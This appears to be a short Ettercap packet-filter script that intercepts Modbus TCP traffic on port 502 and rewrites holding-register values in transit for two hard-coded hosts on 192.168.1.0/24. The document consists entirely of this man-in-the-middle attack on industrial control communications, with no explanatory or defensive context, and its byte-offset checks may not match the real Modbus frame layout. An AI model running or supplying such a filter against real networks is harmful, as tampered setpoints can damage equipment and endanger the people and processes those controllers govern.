if (ip.proto == TCP && tcp.dst == 502) {
    if (ip.src == '192.168.1.11') {
        if (DATA.data + 4 == "\x00\x03") {
            if (DATA.data + 7 == "\x00\x00") {
                DATA.data + 9 = "\x01\xf4";  # 500 in hexadecimal (01F4)
                msg("Modbus holding register value for 192.168.1.11 set to 500");
            }
        }
    }
    else if (ip.src == '192.168.1.13') {
        if (DATA.data + 4 == "\x00\x03") {
            if (DATA.data + 7 == "\x00\x00") {
                DATA.data + 9 = "\x00\x19";  # 25 in hexadecimal (0019)
                msg("Modbus holding register value for 192.168.1.13 set to 25");
            }
        }
    }
}
